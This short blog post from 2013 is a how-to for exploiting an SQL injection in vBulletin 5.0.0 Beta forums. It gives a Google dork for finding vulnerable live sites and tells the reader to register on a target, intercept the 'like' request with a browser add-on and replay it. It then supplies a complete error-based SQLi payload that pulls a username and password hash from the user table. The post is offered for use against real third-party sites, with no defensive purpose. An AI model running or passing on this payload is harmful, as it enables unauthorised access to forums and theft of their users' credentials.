Friday, September 20, 2013

vBulletin 5 Beta XX SQLi 0day

Hello friends ill show how to exploit the SQLi vulnerability on vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28

Things you will need
1.Live http headers addon download from here and install it in firefox
2.Google Dork: "Powered by vBulletin? Version 5.0.0 Beta"

Once you find the site register and login in

Now click on any post at their you will see a like button like this
Now open Live http header addon which we have installed on firefox

Now click on like buttton you will see something like this

Now click on the vote line and press Replay..You will see this
Now after nodeid=8361(number will be different for you) Paste this code
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
Now click on Replay and you will username and pass hash


Post a Comment